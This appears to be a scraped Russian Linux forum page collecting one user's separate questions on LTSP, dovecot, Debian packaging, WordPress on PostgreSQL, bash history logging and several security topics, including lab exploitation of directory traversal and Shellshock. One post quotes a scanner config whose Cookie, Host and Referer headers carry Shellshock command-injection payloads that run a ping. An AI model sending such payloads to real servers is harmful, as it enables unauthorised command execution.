LTSP без интернета
Всем доброго дня.
Необходимо развернуть LTSP сервер, но на машине нету интернета (и не будет). Помогите решить проблему.
Нашел такое решение ltsp на Debian , но меня оно не спасло. Может не так делаю….
Всем доброго дня.
Необходимо развернуть LTSP сервер, но на машине нету интернета (и не будет). Помогите решить проблему.
Нашел такое решение ltsp на Debian , но меня оно не спасло. Может не так делаю….
Доброго дня!
На виртуальной машине установил Debian, и развернул сервер терминалов LTSP, tftp, dhcp, всё настроил (по аналогии настраивал на Минте, и всё хорошо и стабильно работает).
А здесь, при подключении тонкого клиента DHCP сервер отдает ip, но далее ошибка:
firmware failed to load rtl_nic/rtl8168e-3.fw (-2)
Negotiation:... size 550 MB
bs=2048, sz=577085440 bytes
can't read /etc/rc.local: No such file or directory
kvm: disabled by bios
Уважаемые гуру, помогите с решением проблемы.
Собственно, ситуация такая. Развернут на дебиане dovecot 2.1.7. Теперь вопрос. Можно ли настроить его таким образом, что бы при авторизации по 110 порту (например через telnet) все команды протокола (желательно с результатом) логировались ? Например после авторизации, набрав NOOP, STAT и т.д. у меня эти вещи где нибудь писались? Пока только получилось настроить логирование авторизации и выхода (стандартные настройки по-сути).
День добрый. Есть у меня исходники опенсорсных программ, написанных на плюсах Хочу собрать из них deb-пакеты. В этих исходниках есть папки debian, со всеми необходимыми файлами. При запуске утилиты dpkg-buildpackage -b происходит сборка, т.е выполняются команды configure, make, make install и т.д. Однако мне нужно что бы configure выполнялась с моими параметрами (например ./configure --prefix=/usr или другими). Как это сделать ? Содережимое файла debian/rules: #!/usr/bin/make -f %: dh $@
Знаю есть такая утилита как override_dh_auto_configure, но видимо я не понял как её пользоваться...
Собственно вопрос вот в чем, существуют ли агенты для IDS Snort ? Т.е. сам snort у меня стоит на одной машине, но мог при этом собирать алерты с других машин (на которых стоят агенты, или каким-либо другим способом).
Доброго дня. Есть необходимость посмотреть пароли, которыми брутят мои серверы по различным соединеням (ftp, ssh, rdp, telnet, smtp). Про ssh я нашел решение здесь Увидеть пароли, которыми брутят твой SSH-сервер Можно ли увидеть пароли при бруте FTP-сервера, RPD, Telnet и почтового сервера?
День добрый. Пытаюсь на debian, локально, поднять Wordpress, на сервере Apache2 и бд Postgresql (не спрашивайте почему так, просто такие требования у заказчика). Создал бд, пользователя. В конфиг файле WP все прописал. Захожу на локалхост, отрабатывает скрипт install.php, заполнил все поля, и после нажатия кнопки «install WordPress» у меня появляется вот такая картина:
WordPress database error: [ОШИБКА: ошибка синтаксиса (примерное положение: «a») LINE 1: DELETE a, b FROM wp_options a, wp_options b ^] DELETE a, b FROM wp_options a, wp_options b WHERE a.option_name LIKE '\_transient\_%' AND a.option_name NOT LIKE '\_transient\_timeout\_%' AND b.option_name = CONCAT( '_transient_timeout_', SUBSTRING( a.option_name, 12 ) ) AND b.option_value < 1489409649
WordPress database error: [ОШИБКА: ошибка синтаксиса (примерное положение: «a») LINE 1: DELETE a, b FROM wp_options a, wp_options b ^] DELETE a, b FROM wp_options a, wp_options b WHERE a.option_name LIKE '\_site\_transient\_%' AND a.option_name NOT LIKE '\_site\_transient\_timeout\_%' AND b.option_name = CONCAT( '_site_transient_timeout_', SUBSTRING( a.option_name, 17 ) ) AND b.option_value < 1489409649
WordPress database error: [ОШИБКА: ошибка синтаксиса (примерное положение: «FULL») LINE 1: SHOW FULL COLUMNS FROM wp_options ^] SHOW FULL COLUMNS FROM `wp_options`
Мне необходимо слегка модифицировать один опенсорцный проект. В одном из файлов проекта (который выполняется) я написал system(«mkdir /tmp/test»);
Но этот код (как и любой другой башовский) не выполняется. В чем может быть причина ? Значение, возвращаемое system, отследить не могу, т.к. проект является демоном.
Собственно вопрос вот в чем. Как и у всех у меня есть почта на разных доменах (mail,yandex и т.д) Могу ли я её прочесть с помощью связки dovecot и exim ? Вообще для чего эти вещи нужны ? Поясните, пожалуйста, уважаемые знатоки.
Корифеи, нужна помощь. Компилировал файл командой: g++ -o main.cpp main.cpp И как видите в качестве бинарника я ошибочно указал имя сорс файла. Теперь у меня main.cpp это бинарь. Скажите, можно ли восстановить main.cpp, в котором у меня код ?
Уважаемые форумчане. На моей системе (debian, ядро 4.2) развернут веб-сервер apache2. Хочу эксплуатировать уязвимость directory traversal. Собственно вопрос. Какие настройки веб-сервера нужно изменить что бы данная уязвимость работала ? И что нужно сделать, что бы она не работала.
Пишу модуль ядра под разные ОС. Для этого мне нужно использовать адрес таблицы syscall. В ОС с ядром 4.0-x я этот адрес узнавал просто: cat /proc/kallsyms | grep sys_call_table И все что мне надо было на экране. Однако в дистрибутиве Debian 7.8(с ядром 3.2.0-4) вышеуказанная команда не выдает ничего. Подскажите как на этом (и других )дистрибутивах узнать адрес таблицы ?
После зависания системы из-за виртуалбокса у меня слетели все русские надписи, комментарии, имена. Теперь даже в терминале вместо русского текста отображаются крокозябры.
Вот скрин [IMG]http://s017.radikal.ru/i418/1605/bc/42463c8b97e6t.jpg[/IMG]
uname -a: Linux PikAcHuuu 4.2.0-23-generic SMP Tue Mar 1 17:41:12 MSK 2016 x86_64 GNU/Linux
locale: LANG= LANGUAGE= LC_CTYPE=«POSIX» LC_NUMERIC=«POSIX» LC_TIME=«POSIX» LC_COLLATE=«POSIX» LC_MONETARY=«POSIX» LC_MESSAGES=«POSIX» LC_PAPER=«POSIX» LC_NAME=«POSIX» LC_ADDRESS=«POSIX» LC_TELEPHONE=«POSIX» LC_MEASUREMENT=«POSIX» LC_IDENTIFICATION=«POSIX» LC_ALL=
Уважаемые форумчане, у меня к вам очередной вопрос. Сижу я в данный момент в системе под пользователем saimon, соответственно вся моя история терминала пишется в файл /home/semen/.bash_history Если кто-то присоеденился ко мне через ssh или telnet, под этим же логином, то его команды в результате тоже будут сохранены в /home/semen/.bash_history. Вопрос: можно ли сделать так, что бы команды терминала, подсоединенного по ssh сохранялись в другой файл?
Уважаемые форумчане, такой вопрос. Логгируются ли ошибки, возникающие при наборе команд в bash ? Например набрал я команду ma (который нету), мне на экран появляется сообщение: bash: ma: команда не найдена Вот это сообщение где-нибудь сохраняется ? Как bash history. Если же нет, то можно это сделать? Что бы логгировались ошибки. Нужно что бы это было прозрачно. Один раз настроил/прописал (если возможно). Далее пользователь поработал, и после этого можно было бы посмотреть лог с ошибками.
Уважаемые форумчане, нужен совет. Как известно все набранные, в терминале, команды сохраняются в истории, а точнее в файле bash_history. Если же у меня есть скрипт init.sh, в котором последовательно выполняются команды. Получается что запустив этот скрипт в истории будет зафиксирована только команда запуска скрипта. Вопрос. 1) Можно ли узнать какие команды выполняются при запуске этого скрипта ? 2) если же перед командой нажать «пробел», то она тоже не будет фиксироваться в bash_history. В таком случае как узнать какая команда была выполнена ?
Уважаемые форумчане, помогите. Хочу проэксплуатировать уязвимость shellshock. На виртуалке (с IP-адресом 192.168.1.1) я развернул ОС с этой уязвимостью, и веб-сервер. Как мне выполнить нижеприведенный скрипт с хостовой системы (c IP адресом 192.168.1.2), что бы он был как HTTP-запрос ?
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 192.168.1.2
http-header = Host:() { :; }; ping -c 3 192.168.1.2
http-header = Referer:() { :; }; ping -c 3 192.168.1.2
Собственно, вопрос вот в чем. Есть у меня VirtualBox. На нем развернуто несколько виртуальных машин с разными операционками. На одной из виртуалок я хочу развернуть вирус (в исследовательских целях). Какие средства защиты необходимо использовать, что бы вирус не выбрался за рамки виртуалки на хостовую систему или на другие виртуальные машины?
Например зашел пользователь user, набрал sudo su, ввел пароль и он стал рутом. Или использовал какую-нибудь уязвимость в программе, которая дает права рута в системе. Как можно отследить, что пользователь в системе повысил права до рута ? Может где-то видутся логи, или существует сигнал какой-нибудь ?